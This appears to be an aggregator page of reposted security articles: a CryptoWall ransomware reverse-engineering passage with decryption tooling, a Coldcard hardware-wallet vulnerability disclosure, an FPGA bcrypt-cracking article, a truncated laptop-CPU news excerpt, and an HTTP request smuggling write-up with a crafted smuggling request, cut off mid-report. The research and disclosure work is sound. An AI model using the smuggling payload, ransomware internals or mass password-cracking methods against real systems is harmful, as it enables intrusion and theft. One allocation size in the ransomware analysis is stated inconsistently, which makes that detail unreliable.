    DuplicatedKey = HeapAlloc(16)
    if (DuplicatedKey)
        CryptDuplicateKey(OriginalKey, 0, 0, DuplicatedKey)
        memcpy(DuplicatedKey, OriginalKey, OriginalKey_size)
        CryptDestroyKey(OriginalKey)

Essentially, CryptDuplicateKey makes an exact copy of a key and of the key's state. The DuplicatedKey variable ends up becoming a struct: as we can see after the function call at 0x00412C7A, it gets used to store volume information about the drive currently being infected.

GetVolumeInformation(driver_letter, DuplicatedKey + 20);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
                                    (DuplicatedKey + 16), 0) )
{
    ...

That is why 24 bytes were allocated on the heap when creating this variable instead of 16. Now we can define our struct from what we know so far:

struct _DupKey
{
    const char *key;
    int key_size;
    DWORD unknown1;
    DWORD unknown2;
    char *drive_letter;
    LPDWORD lpVolumeSerialNumber;
    DWORD unknown3;
};

// Now our code looks cleaner than above
GetVolumeInformation(driver_letter,
                     &DuplicatedKey->lpVolumeSerialNumber);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
                                    &DuplicatedKey->drive_letter, 0) )
{
    ...

Encrypting of Files

After the malware is finished storing all pertinent information regarding how and where it will do its encryption, CryptoWall moves forward to the main encryption loop at 0x00416780.

Encryption Loop Control Flow Graph

As we can see, the control flow graph is fairly long in this subroutine, but nothing out of the ordinary when it comes to ransomware; a lot has to be done before encrypting files. At the start of this function, we see an immediate call to HeapAlloc to allocate 260 bytes of memory. We can safely assume this will be used to store a file's absolute path, as Windows only allows paths up to 260 characters (MAX_PATH). Upon success, there is also an allocation of virtual memory with a size of 592 bytes (which happens to match the size of a WIN32_FIND_DATAW structure) that will later hold the found file's information. The API call FindFirstFileW then uses this newly allocated buffer to store the first filename found on the system. The pseudo-code below explains the flow:

lpFileName = Allocate260BlockOfMemory();        // HeapAlloc
if ( lpFileName )
{
    (*(wcscpy + 292))(lpFileName, driver_letter);
    ...
    lpFindFileData = AllocateSetMemory(592);    // VirtualAlloc
    if ( lpFindFileData )
    {
        hFile = (*(FindFirstFileW + 504))(lpFileName, lpFindFileData);
        if ( hFile != 0xFFFFFFFF )
        {
            v29 = 0;
            do
            {
                // Continue down to further file actions

Before the malware opens up the first victim file, it needs to make sure the file name and extension are not part of its hardcoded blacklist. It does this check using a simple CRC-32 hash: it takes the filename and extension, compresses each down to a DWORD, then compares that DWORD to a list of values that live in the .data section.

To see how the algorithm works, I reversed it into python code and wrote my own file checker.

➜  python tor_site_checksum_finder.py --check-file-ext "dll"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[-] '.dll' is not a valid file extension for Cryptowall

➜ python tor_site_checksum_finder.py --check-file-ext "py"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[+] '.py' is a valid file extension for Cryptowall

Now we can easily tell what types of files CryptoWall will attack. Obvious extensions like .dll, .exe, and .sys are very common file types for ransomware to avoid.

If the file passes these two checks, it moves on to the last part of the equation: the actual encryption, located at 0x00412260. We can skip the first few function calls, as they are not pertinent to what is about to happen. If you take a look at address 0x00412358, there is a subroutine that takes three parameters: a file handle, our DuplicateKeyStruct, and a file size. Stepping into the function, we can immediately tell what is happening:

if ( ReadFileA(hFile, lpBuffer, DuplicateKeyStruct->file_hash_size,
               &lpNumberOfBytesRead, 0)
     && lpNumberOfBytesRead == DuplicateKeyStruct->file_hash_size )
{
    if ( memcmp(lpBuffer, DuplicateKeyStruct->file_hash,
                DuplicateKeyStruct->file_hash_size) == 0 )
    {
        isCompare = 1;
    }
}

The pseudo-code tells us that if the MD5 hash of the file is present in the header, the file has already been encrypted. If this function returns isCompare as true, CryptoWall moves on to another file and leaves this one alone. If Compare16ByteHeader() returns false, the malware appends to the file's extension, using a simple algorithm to generate a three-letter string to place at the end. The generation takes a timestamp, uses it as a seed, and for each of the first three bytes takes the value mod 26 and adds 97.

*(v8 + 2 * i) = DataSizeBasedOnSeed(0, 0x3E8u) % 26 + 97;

This is essentially a rotation cipher: the value is reduced modulo 26 to keep it within the alphabet, and the addition of 97 shifts it into the lowercase ASCII range. As an example, the letter 'A' (ordinal 65) maps to 65 % 26 + 97 = 110, which is an 'n'. In conclusion, if the victim file is named hello.py, this subroutine will rename it to something like hello.py.3xy.
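
A sketch of the renaming step in python; DataSizeBasedOnSeed is approximated with python's own PRNG seeded from the timestamp, so only the shape of the output is meaningful:

import random
import time

random.seed(int(time.time()))      # timestamp used as the PRNG seed
# three values in [0, 0x3E8), each reduced mod 26 and shifted into 'a'..'z'
ext = "".join(chr(random.randrange(0x3E8) % 26 + 97) for _ in range(3))
print(f"hello.py -> hello.py.{ext}")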

Next, around address 0x004123F0, the generation of an AES-256 key begins with another call to Win32's CryptAcquireContextW. The hProv handle gets passed over to be used in CryptGenKey and CryptGetKeyParam.

if ( CryptGenKey(hProv, 0x6610, 1, &hKey) )
{
    pbData_1 = 0;
    pdwDataLen_1 = 4;
    if ( CryptGetKeyParam(hKey, 8, &pbData_1, &pdwDataLen_1, 0, 4) )

The hexadecimal value 0x6610 shown above tells us that the generated key is going to be AES-256 (CALG_AES_256), as seen in MS-DOCS. Once hKey, the address to which the function copies the handle of the newly generated key, is populated, CryptGetKeyParam is used to materialize the key and transfer it into pbData, a pointer to a buffer that receives the data. One last call in the function we labeled GenerateAESKey() is CryptExportKey: it takes the handle of the key to be exported and returns a key BLOB. The second parameter of GenerateAESKey() will hold the aes_key.

The next call is one of the most important ones for understanding how we can eventually decrypt the files that CryptoWall infected. EncryptAESKey() uses the pointer DuplicateKeyStruct->rsa_key to encrypt our AES key into a 256-byte blob. Exploring inside this function call is fairly simple: it uses CryptDuplicateKey and CryptEncrypt to take our public RSA 2048-bit key from earlier and our newly generated AES key, duplicate both keys to save for later, and encrypt the buffer. The fifth parameter is our data out in this case; once the function returns, what we labeled encrypted_AESkey_buffer will hold our RSA-encrypted key.

At around address 0x004124A5, you will see two calls to WriteFileA. The first call writes the 16-byte MD5 hash at the top of the victim file, and the second call writes out the 256 bytes of encrypted key buffer right below the hash.

Screenshot shows a 128-byte encrypted key buffer, but that was a copy mistake; it is supposed to be 256 bytes of encrypted key text.

The picture above shows what an example file looks like up to this stage of the infection. The plaintext is still intact, but the header now holds the hash of the file and the encrypted AES key used to encrypt the plaintext in the next phase. ReadFileA shortly gets called at 0x0041261B, reading everything after the header of the file to start the encryption process.

Now that 272 bytes belong to the header, anything after that is free range for the next function. We don't need to dive too deep into DuplicateAESKey_And_Encrypt(), as it is pretty self-explanatory: the file contents are encrypted using the already-generated AES key from above, passed in via the HCRYPTKEY *hKey variable. The sixth parameter of this function is the pointer that will contain the encrypted buffer. At this point the ransomware replaces the plaintext with an encrypted blob, and the AES key is freed from memory.

Example of a fully encrypted file

After the file is finished being processed, the loop continues until every allow-listed file type on disk is encrypted.

Decrypting Victim Files

Unfortunately, in this case it is only possible to write a decryption algorithm if you know the private key, which is generated on the C2 side. This is going to be a two-step process: in order to decrypt the file contents, we first need to decrypt the AES key that was RSA-encrypted.

The fake C2 server I wrote also includes an area where a private key is generated at the same time as the public key. So in my case, all encrypted files on my VM can be decrypted.

Side Note: In order to run this C2 server, you have to point the malware's hardcoded I2P addresses at localhost in the Windows hosts file (C:\Windows\System32\drivers\etc\hosts). Then make sure the server has started before executing the malware, as there will be a lot of initial verification going back and forth between the malware and 'C2' to ensure its legitimacy. Your file should look like this:

127.0.0.1 proxy1-1-1.i2p
127.0.0.1 proxy2-2-2.i2p

Another reason why we run the fake C2 server before executing the malware is so we don't end up in some deadlock state. The output from our server will look something like this:

C:\CryptoWall\> python.exe fake_c2_i2p_server.py

* Serving Flask app "fake_c2_server" (lazy loading)
127.0.0.1 - - [31/Mar/2020 15:10:06] "GET / HTTP/1.1" 404 -

Data Received from CryptoWall Binary:
------------------------------
[!] Found URI Header: 93n14chwb3qpm
[+] Created key from URI: 13349bchmnpqw
[!] Found ciphertext: ff977e974ca21f20a160ebb12bd99bd616d3690c3f4358e2b8168f54929728a189c8797bfa12cfa031ee9c2fe02e31f0762178b3b640837e34d18407ecbc33
[+] Recovered plaintext: b'{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}'

[+] Sending encrypted data blob back to cryptowall process
127.0.0.1 - - [31/Mar/2020 15:11:52] "POST /93n14chwb3qpm HTTP/1.1" 200

Step by step: the first thing we have to do is write a program that imports the private key file. I used C++ for this portion because, for the life of me, I could not figure out how to mimic the CryptDecodeObjectEx API call that decodes the key in X509_ASN_ENCODING and PKCS_7_ASN_ENCODING format. Once you have the key blob from this function, we can call CryptImportKey just as the malware does, but this time with a private key instead of a public one ;). Since the first 16 bytes of the victim file contain the MD5 hash of the unencrypted file, we know we can skip that part and focus on the 256 bytes after it. The block size is going to be 256 bytes and the AES offset will be 272, since that will be the last byte needed in the cryptographic equation. Once we get the blob, it is now okay to call CryptDecrypt and print out the 32-byte key blob:

if (!CryptDecrypt(hKey, NULL, FALSE, 0, keyBuffer, &bytesRead))
{
    printf("[-] CryptDecrypt failed with error 0x%.8X\n", GetLastError());
    return FALSE;
}

printf("[+] Decrypted AES Key => ");
for (int i = 0; i < bytesRead; i++)
{
    printf("%02x", keyBuffer[i]);
}

You can find the whole script here. Now that we are halfway there and have an AES key, the last thing to do is write a simple python script that takes that key and the encrypted file and decrypts everything after the 272nd byte.

from Crypto.Cipher import AES  # pip install pycryptodome

enc_data_remainder = file_data[272:]   # skip 16-byte MD5 + 256-byte encrypted key header
cipher = AES.new(aes_key, AES.MODE_ECB)
plaintext = cipher.decrypt(enc_data_remainder)

The script to perform this action is in the same folder on Github. If you want to see how the whole thing looks from start to finish, it will go like this:

➜  decrypt_aes_key.exe priv_key_1.pem loveme.txt
[+] Initialized crypto provider
[+] Successfully imported private key from PEM file
[!] Extracted encrypted AES keys from file
[+] Decrypted AES Key => 08020000106600002000000040b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Successfully decrypted key from file

➜ python decrypt_file.py loveme.txt 40b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Decrypting file
[+] Found hash header => e91049c35401f2b4a1a131bd992df7a6
[+] Plaintext from file: b'"hello world" \r\n'

Conclusion

Overall, this was one of the biggest cyber threats back in 2013, and the threat actors behind this malicious virus showed their years of experience when it comes to engineering ransomware such as this.

Although this ransomware is over 6 years old, it still fascinated me so much to reverse engineer this virus that I wanted to share all the tooling I wrote for it. Every step of the way there was another challenge to overcome, whether it was knowing what the malware expected the encrypted payload coming back from the C2 to look like, figuring out how to decrypt the RC4 traffic of its I2P C2 servers, decompressing the ransomware note using a hard-to-mimic LZNT1 algorithm, or even understanding its obscure way of generating domain URI paths… it was all around a gigantic puzzle for a completionist engineer like myself.

Here is the repository that contains all the programs I wrote that helped me research CryptoWall.

Thank you for following along! I hope you enjoyed it as much as I did. If you have any questions on this article or where to find the challenge, please DM me at my Instagram: @hackersclub or Twitter: @ringoware

Happy Hunting 🙂

Coldcard isolation bypass

Original text by benma

Shift Crypto responsibly disclosed the remote exploit to Coinkite (Coldcard) on August 4th, 2020, and mutually agreed to a 90-day disclosure embargo period. Coinkite created a fix on September 30th but, as of this date, has not yet released a firmware update to mitigate potential exploits in the wild. The fix on September 30th explicitly described the issue and attack scenarios in the changelog, and the 90-day embargo period, including requested extensions, has lapsed. Therefore, we now disclose the issue, and we encourage Coldcard users to take appropriate precautions until an update is available.


The original issue

On August 4th 2020, @mo_nokh disclosed a vulnerability in the Ledger hardware wallets in which a user could unknowingly confirm a Bitcoin transaction that was masquerading as an altcoin or testnet transaction:

An attacker can exploit this method to transfer Bitcoin while the user is under the impression that a transaction of another, less valuable altcoin (e.g. Litecoin, Testnet Bitcoins, Bitcoin Cash, etc.) is being executed

A quick high-level summary of how this is possible:

When you create a transaction proposal on your computer, the transaction is sent to the hardware wallet to be confirmed by the user and formally signed. The computer also tells the hardware wallet what kind of coin we are dealing with, e.g. “this is a Litecoin transaction, please show the amounts as Litecoin and display the addresses in Litecoin’s address formats”. The hardware wallet will just take that info, and show, for example “Sending 1 LTC to ltc1…”.

Litecoin, Bitcoin, their testnets and some other coins all have the exact same transaction representation under the hood. For example, there is nothing in a Bitcoin transaction that says it is a Bitcoin transaction and not a Litecoin transaction. From a hardware wallet’s point of view, a valid Litecoin transaction proposal is also a valid Bitcoin transaction proposal.

As a consequence, a compromised wallet on the computer can simply create a transaction spending bitcoins to the attacker, and send it to the hardware wallet as a Litecoin transaction. The user will only see Litecoin information on the device (addresses in Litecoin’s address format, amounts denominated in Litecoin, etc) while not suspecting that they are in fact sending bitcoins.

The problem is mitigated by allocating separate private keys to separate coins, as described by BIP44. If all your bitcoins use one set of private keys and all your litecoins use a different set, then signing a Litecoin transaction with Litecoin keys can never spend actual bitcoins. The BitBox02 has always enforced this key separation strictly (see the sketch below).
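
For illustration, this separation falls out of the BIP44 derivation path, whose second level is a hardened coin type (per SLIP-44: Bitcoin = 0, Testnet = 1, Litecoin = 2). A sketch:

# BIP44 path layout: m / purpose' / coin_type' / account' / change / address_index
PATHS = {
    "bitcoin":  "m/44'/0'/0'/0/0",
    "testnet":  "m/44'/1'/0'/0/0",
    "litecoin": "m/44'/2'/0'/0/0",
}
# With key separation enforced, keys derived under coin_type 1 (testnet)
# can never sign away UTXOs held by keys under coin_type 0 (mainnet bitcoin).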

Coldcard

When the isolation bypass vulnerability was disclosed, Coldcard responded quickly that they were not affected:

This, unfortunately, was not true. While the Coldcard does not support “shitcoins”, it does support testnet. A quick test confirmed that the Coldcard was in fact vulnerable in the exact same way as Ledger. A user confirming a testnet transaction on the device could be spending mainnet (i.e. the real thing) funds without their knowledge.

For example, this real mainnet transaction:

…is confirmed and signed like this when sending the same real mainnet transaction to the Coldcard while it is in testnet mode:

Impact and severity

As a hardware wallet user, you should assume your computer is compromised; that is the reason to use a hardware wallet in the first place. Starting from there, exploiting this attack is not very far-fetched. The attacker merely has to convince the user to e.g. "try a testnet transaction", or to buy into an ICO with testnet coins (I've heard there was an ICO like this recently), or use any number of social engineering attacks to make the user perform a testnet transaction. After the user confirms a testnet transaction, the attacker receives mainnet bitcoin in the same amount.

Since the attack can be performed remotely, it counts as a critical issue according to Shift’s security assessment guideline. Severity points are deducted as the attack does not scale very well:

  • the device has to be unlocked and user interaction is required
  • the attacker has to convince the user to make a testnet transaction to the attacker’s testnet address

Credit

I did not discover the isolation bypass attack, all credit goes to @mo_nokh, who published the original attack on the Ledger. After reading about it, I remembered that the Coldcard has testnet support. I quickly built a proof-of-concept to see if this attack is feasible. Seeing that it indeed is, I immediately responsibly disclosed the issue to the Coldcard team.


Disclosure timeline:

  • The issue was responsibly disclosed to Coinkite on Aug. 4th, 2020.
  • Coinkite acknowledged the issue on Aug. 5th and asked for 90 days to fix the issue.
  • Coinkite created a fix on Sept. 30th, publicly disclosing the issue and attack scenario in the changelog:
    https://github.com/Coldcard/firmware/pull/49/files
  • Noticing the fix, on Oct. 14th we asked when to expect a firmware release. Coinkite informed us that additional items were being added in advance of the next firmware release.
  • On Nov 12th, one week beyond the embargo period, we asked again when to expect a firmware release and gave notice that we would release our disclosure soon. Coinkite informed us that the release would be further delayed, but imminent, as additional items were being included.
  • On Nov 21st, we informed Coinkite that we would publish our disclosure on Nov 24th.
  • On Nov 23rd, Coldcard published a BETA version of the next firmware with the fix included:
    https://github.com/Coldcard/firmware/tree/master/releases

Discuss on Reddit.

Originally published at https://benma.github.io.

AMD laptops have a hidden 10-second performance delay. Here’s why

Original text by L33TDAWG

Arstechnica

In an embargoed presentation Friday morning, Intel Chief Performance Strategist Ryan Shrout walked a group of tech journalists through a presentation aimed at taking AMD’s Zen 2 (Ryzen 4000 series) laptop CPUs down a peg.

Intel’s newest laptop CPU design, Tiger Lake, is a genuinely compelling release—but it comes on the heels of some crushing upsets in that space, leaving Intel looking for an angle to prevent hemorrhaging market share to its rival. Early Tiger Lake systems performed incredibly well—but they were configured for a 28W cTDP, instead of the far more common 15W TDP seen in production laptop systems—and reviewers were barred from testing battery life.

This left reviewers like yours truly comparing Intel’s i7-1185G7 at 28W cTDP to AMD Ryzen 7 systems at half the power consumption—and although Tiger Lake did come out generally on top, the power discrepancy kept it from being a conclusive or crushing blow to AMD’s increasing market share with the OEM vendors who are actually buying laptop CPUs in the first place.

Bcrypt password cracking extremely slow? Not if you are using hundreds of FPGAs!

Original text by ScatteredSecrets.com

Cracking classic hashes

Moore’s law is the observation that the number of transistors in a dense integrated circuit doubles about every two years. This roughly doubles computing power about every two years as well. Password hashing algorithms typically have a lifetime of many decades. This means that the level of protection of a given password hash algorithm decreases over time: attackers can crack longer and more complex passwords in the same amount of time.

The introduction of powerful Graphics Processing Units (GPUs) and supporting software frameworks revolutionized password cracking. Starting over a decade ago, high performance GPU password cracking tools were published, massively outperforming Central Processing Units (CPUs) that were typically used for password cracking at the time. The speed-up was a factor of 50 to 100 for many algorithms: another big step back for the protection level of your passwords. The impact of the combination of Moore’s law and the introduction of GPUs is massive.

Let us take a closer look at a classic password hashing algorithm that was very popular a decade ago and is still in use today: MD5. The hash rate — the number of passwords that can be guessed per second — on a decade-old AMD Phenom II X4 965 CPU was about 95M hashes per second. On a recent Nvidia RTX 2080Ti high-end GPU, the hash rate is about 54,000M hashes per second: a factor of roughly 570 faster. Similar speed-ups can be seen for other classic password hashing algorithms like SHA-1 and SHA-2. It is clear that classic password hashing algorithms are losing the battle, and that the GPU is the weapon of choice for cracking classic password hashes.

Advanced hashes

Some password hash designers recognized the importance of designing algorithms that could cope with ever increasing computing power. They introduced two new characteristics: a variable iteration count and memory hardness.

Using a variable iteration count is a way to make password cracking more time-consuming by requiring repeated hashing. The number of rounds for repeated hashing is configurable. This allows an algorithm to stay resistant to password cracking attacks even if computation power significantly increases: if computing power doubles, the iteration count can also be doubled, resulting in a similar hash rate (the short sketch below illustrates this).
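
A quick way to see this effect is the iterations parameter of PBKDF2 (a sketch; absolute timings depend on your machine):

import hashlib
import time

for iterations in (100_000, 200_000):
    start = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", b"hunter2", b"somesalt", iterations)
    elapsed = time.perf_counter() - start
    print(f"{iterations} iterations: {elapsed:.3f}s")  # doubling iterations roughly doubles the time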

Memory hardness is used to slow down specific hardware platforms by using a relatively large amount of memory to calculate a password hash. If the amount of required memory is higher than the amount of local fast memory available to the computing core (‘level 1 cache’), the computing core needs to wait for data from slower memory. This results in a significant drop in performance. For some memory hard algorithms the required amount of memory is fixed. If the cracking platform has more level 1 cache on board, the algorithm’s countermeasure is ineffective. For other algorithms, the memory usage is variable and can simply be set to a value higher than the amount available in the most potent attack platform. This value can be updated over time. So having more computing power alone is not good enough to accelerate password cracking; the platform also needs enough fast memory to fit the entire algorithm in.

In the last decades, a number of advanced password hashing algorithms were introduced. The most well-known ones are bcrypt (1999), scrypt (2009) and Argon2 (2015). All use a configurable iteration count. Memory usage of bcrypt is fixed; the others also support configurable memory usage.

Meet bcrypt

Scattered Secrets is a password breach notification and prevention service. We continuously collect publicly available hacked databases and try to crack the corresponding passwords. The majority of breached databases we encounter contain classic hashes, but the number of databases that contain advanced hashes is increasing — typically deploying bcrypt hashes. Even though both scrypt and Argon2 are better choices because of the configurable memory usage, it seems that those two are not used on a large scale yet.

Taking a closer look at bcrypt hashes, we see that the configurable iteration count in bcrypt is called the ‘work factor’. The work factors we see in the wild vary between 7 and 14, meaning between 2⁷ = 128 and 2¹⁴ = 16,384 iterations.
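The work factor is stored inside the hash string itself, so it can be read straight from breached hashes. A minimal Python sketch using the pypi bcrypt package (the password and cost are made up for illustration):

import bcrypt

# Hash a password with work factor 12 (2**12 = 4,096 iterations).
hashed = bcrypt.hashpw(b"correct horse", bcrypt.gensalt(rounds=12))

# The cost lives in the second $-separated field: b"$2b$12$..." -> 12.
work_factor = int(hashed.split(b"$")[2])
print(work_factor)  # 12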


Let us check the hash rates for all real-life work factors on both an AMD EPYC 7401P and an Nvidia RTX 2080Ti, a CPU and a high-end GPU with comparable prices. For completeness, work factor 5 is also included, since this is the de-facto standard for benchmarking purposes.

Figure 2: bcrypt hash rates, CPU versus GPU

It is clear that the hash rate on both CPU and GPU is extremely low compared to the 54,000M hashes per second for MD5 on a GPU.

It is also clear that the memory hardness of the 1999 algorithm is still good enough in 2020 to slow GPUs down: the 50 to 100 times advantage over the CPU is completely gone. The reason is obvious if you take a closer look at the internals of bcrypt and the specifications of the heart of the GPU, in this case the Turing TU102. Bcrypt needs over 4 kilobytes of fast memory to run at full speed. The TU102’s 4,352 cores have only 1 kilobyte of level 1 cache available per core, meaning that the cores spend a lot of time waiting for access to slower memory. In contrast, the CPU used has a level 1 cache of 96 kilobytes (32 kB for data, 64 kB for instructions) per core, so no delays there.

Conclusion? Cracking bcrypt hashes on a CPU or GPU is not very effective. Anything other than a very basic dictionary attack is infeasible. We need something different.

FPGAs to the rescue

Field Programmable Gate Arrays (FPGAs) are chips that can be programmed for a special application after manufacturing. Unlike a CPU or GPU, FPGAs do not run code. Instead, an FPGA is the code, built in hardware. This means that FPGAs can be programmed as dedicated, optimized password hashing circuitry. Although FPGA clock speeds are significantly lower than those of CPUs and GPUs — typically hundreds of Megahertz versus a few Gigahertz — the dedicated circuitry runs more efficiently. This is true for both performance per Megahertz and performance per Watt.

The first commercial FPGA-based crackers were available in the mid 2000s. It took many years before the first free and open source password crackers became available. In 2016, the community enhanced version of John The Ripper started supporting the ZTEX 1.15y: quad Spartan-6 LX150 FPGA boards that were quite popular for mining crypto currency in earlier years. With the release of version 1.9.0-jumbo-1 in 2019, John The Ripper officially added support for 7 hash types including bcrypt. Although the boards — introduced in 2011 — are not using the latest generation of FPGAs, they are good enough to run 124 optimized bcrypt cores per FPGA. This results in a high bcrypt hash rate: higher than the hash rate of the latest generation of high-end GPUs:

Figure 3: bcrypt hash rates

A single quad FPGA board from 2011 outperforms a latest-generation RTX 2080Ti GPU by a factor of over 4. For Scattered Secrets it was clear that using john with the ZTEX boards was the way forward for bcrypt cracking.
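For reference, driving the ZTEX boards through john looks roughly like this; the bcrypt-ztex format name is from the jumbo release notes, and exact device-selection flags may vary per setup:

$ john --list=formats | grep ztex     # confirm the ZTEX formats are compiled in
$ john --format=bcrypt-ztex --wordlist=wordlist.txt hashes.txt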

From proof of concept to production v1

The ZTEX 1.15y board is a discontinued product. Although the boards were popular for crypto currency mining, their availability on the second hand market was and is limited. Finding boards was a challenge. It took us almost two years of monitoring several online marketplaces until we were able to find boards in large quantities. Once found, buying the devices was challenging as well. Sellers typically want to stay anonymous, so checking trustworthiness is an issue. Hardware escrow? Coming from professional corporate environments, the processes used looked… interesting… to us. The only accepted payment method? Crypto currency. Testing or pick-up in person? No way. All the ingredients of a good scam. No guts no glory: after transferring Bitcoins to our anonymous friends, we acquired a large number of boards, of which almost all were in working condition.

In early 2019 we built our first FPGA cracker, based on 12 ZTEX boards and an Intel J4005 based PC. This machine was mainly used for testing the concept for large scale deployment in production.

Figure 4: proof of concept / production v1 setup

We used 12 FPGA boards for a number of practical reasons. First of all, 12 devices can be connected using two off-the-shelf USB hubs, so switching hardware during testing or in case of issues in production does not require waiting for shipments of exotic products and is inexpensive. Secondly, 12 devices can easily be built into an off-the-shelf 4U case by non-experts. Thirdly, common-spec power supplies can be used.

The initial system design performed surprisingly well: FPGA performance scaled perfectly, system cooling performed above expectation, the controller PC had more than enough computing power to keep all FPGAs busy, and the system was stable. After a two-month test period and some minor upgrades, the first v1 system was put into production and has so far been running without noticeable issues.

Figure 5: from zero to (datacenter) hero

Production v2

With the high bcrypt hash rate of the now proven concept, it was clear that building more FPGA-based crackers was at the top of our wishlist. Preparations started as soon as the first v1 system was in production. To maximize performance per system and to professionalize construction, we contacted an instrument maker. His design simplified the setup and added another 6 FPGA boards per system, totaling 18 boards / 72 FPGAs.

Figure 6: simplified design with 6 boards per row (x3 rows)

The hardware setup is very similar to the v1 design: the only major changes are a more powerful and more efficient power supply, plus exotic many-port USB hubs that connect all 18 FPGA boards to the controller PC using just two hubs.

Figure 7: the first completed production v2 setup

The number of issues was quite limited. Problems were mainly related to the USB hubs. It seems that some USB hubs require more power than the PC mainboard can provide. Other USB hubs were unreliable: USB connectivity dropped during longer test runs. Finally, specifications of some Chinese manufacturers were incorrect, not providing USB 2.0 (480 Mbps) links as promised, but USB 1.1 (12 Mbps) which is too slow to keep the FPGAs working at full speed. Thorough testing showed that HS8836-based hubs were the most reliable.

Figure 8: USB chips

After some minor design updates, the first v2 system was ready. Three clones quickly followed. After successful burn-in tests, the first set of four v2 systems was moved to production in late 2019.

Figure 9: a new set of bcrypt v2 crackers ready for production

A picture of a stack of FPGA crackers posted on social media resulted in a number of questions. Most questions are answered above. The most important ones are not: what is the hash rate and what is the power usage of one of the bcrypt crackers? Here you go:

Figure 10: performance and power usage of a v2 cracker

To translate the figures to GPU performance: to match the bcrypt crunching power of a single v2 cracker, you need about 75 to 80 Nvidia RTX-2080Ti GPUs. That is one FPGA-based machine versus a server rack full of GPU-based systems, burning about 25 kilowatts of power! So FPGA-based cracking is not only fast, it is also relatively economical to run.

After running many FPGA-based systems in production for months now, we have cracked an enormous number of bcrypt hashes that were previously practically uncrackable using conventional hardware. This generates a lot of quality content, enabling our clients to protect their accounts against account takeover with our unique intel. Scattered Secrets ♥ passwords 😉 Don’t forget to check if your passwords are breached!

Edit Aug-2020: original GPU benchmarks were based on hashcat 5.1.0 using OpenCL. Since publication, hashcat’s bcrypt performance was improved significantly and hashcat 6 was introduced, using CUDA. As a result, the bcrypt hash rate for work factor 5 on hashcat 6.1.1 using CUDA on a RTX 2080Ti is now ~53k/s instead of the original ~28k/s.

The Powerful HTTP Request Smuggling

The Powerful HTTP Request Smuggling

Original text by Ricardo Iramar dos Santos

TL;DR: This is how I was able to exploit a HTTP Request Smuggling in some Mobile Device Management (MDM) servers and send any MDM command to any device enrolled on them for a private bug bounty program.

I am inevitable

What is HTTP Request Smuggling? 📖

If you already know what HTTP Request Smuggling is, you can skip this section, but if you want to know the basics, I’d recommend reading carefully.

In this section I’ll try to put everyone on the same page, covering only the basics of HTTP Request Smuggling. If you want to learn it in detail, I recommend you read this documentation https://portswigger.net/web-security/request-smuggling, read all the references and do all the labs.

In August 2019, when James Kettle brought HTTP Request Smuggling back from the ashes, I tried to understand this vulnerability, and at that time it was difficult for me to understand everything.

Now, after exploiting a few instances, I see why it is hard to grasp at first glance. Most of the time we are looking for a vulnerability in the application, while HTTP Request Smuggling also involves another layer: the network.

The images from now on in this section are from this YouTube video “$6,5k + $5k HTTP Request Smuggling mass account takeover — Slack + Zomato”. Thanks Grzegorz Niedziela for allowing me to use the images! I strongly recommend watching this video after reading this post.

Before talking about HTTP Request Smuggling itself, let’s recap some features of HTTP protocol version 1.1. An HTTP server can process multiple requests over the same TCP connection.


The Content-Length header defines the size of the body, which tells the server where the body ends. There is another header, Transfer-Encoding, which can also define the size of the body.


The Transfer-Encoding header indicates the body will be sent in chunks; the number at the beginning of each chunk indicates its size in hexadecimal. The last chunk is indicated with size 0, which marks the end of the body.

The main difference between Content-Length and Transfer-Encoding is that in the first case the request sends the entire body at once, while with Transfer-Encoding the body is sent in pieces.
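To make this concrete, here is the same (hypothetical) body sent both ways; note that 0xb is 11, the length of q=smuggling:

POST /search HTTP/1.1
Host: example.com
Content-Length: 11

q=smuggling

POST /search HTTP/1.1
Host: example.com
Transfer-Encoding: chunked

b
q=smuggling
0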

But what happens when both headers are present?


RFC 2616 is clear about this in section 4.4 (Message Length, page 34):

If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.

The RFC describes the beauty of the theory, but this is not what happens in practice. When an environment does not respect the sentence above, HTTP Request Smuggling becomes possible.

Nowadays it is pretty common to see a web application in the back-end with a reverse proxy in the front-end.


What happens if Bob sends a request with both Content-Length and Transfer-Encoding, and the front-end and back-end interpret these headers differently, ignoring RFC 2616? Let’s assume Alice also sends a request right after Bob, with only the Content-Length header.


Picture Bob’s and Alice’s requests one next to the other. Bob’s request comes first, and the front-end uses the Content-Length header (ignoring Transfer-Encoding) to define the body length, which means that for the front-end, Bob’s request ends right after the text key=value and Alice’s request starts at POST / HTTP/1.1.

On the other side, the back-end uses the Transfer-Encoding header (ignoring Content-Length), defining the end of Bob’s request at the number 0 and assuming Alice’s request starts with the text key=value, which is an invalid request.

If Bob is a skilled attacker, he can craft a malicious request and force Alice to receive a different response from the one her request was supposed to produce.
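A minimal sketch of such a crafted request, assuming a front-end that honors Content-Length and a back-end that honors Transfer-Encoding (CL.TE; host and path are hypothetical, and Content-Length must count exactly the smuggled bytes):

POST / HTTP/1.1
Host: vulnerable.example.com
Content-Length: 36
Transfer-Encoding: chunked

0

GET /evil HTTP/1.1
X-Ignore: x

The front-end forwards all 36 body bytes as one request; the back-end stops reading at the 0 chunk and treats GET /evil as the start of the next request, while the trailing X-Ignore header (sent without a final line break) swallows the first line of Alice’s request.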

That’s the most important part of HTTP Request Smuggling. If you didn’t get what is happening here, I strongly recommend you go back and read everything again.

Reporting HTTP Request Smuggling📝

I was scanning some subdomains using Smuggler in a private bug bounty program on Hackerone when I initially found 13 subdomains reported by Smuggler as potentially vulnerable to HTTP Request Smuggling. I reported all of them in one single report as critical, even without a real PoC, because I was afraid of getting a duplicate, and decided to work on the impact later. I got that feeling there was something big that would require time to investigate.

If you have run Smuggler before, you probably know that most of the time it reports a target as potentially vulnerable but you cannot get any real impact directly. For each case, research is required to understand the context and test a malicious scenario to prove the impact.

The most common impact that I’ve seen is what I call a Universal Redirect. A Universal Redirect is when you can force any user to receive a malicious response which redirects the user to another domain.

As usual, the Hackerone triager asked me for a PoC with a valid impact, which is a fair request. From those 13 subdomains reported as potentially vulnerable, I was able to quickly find one vulnerable to Universal Redirect by just sending the request below.


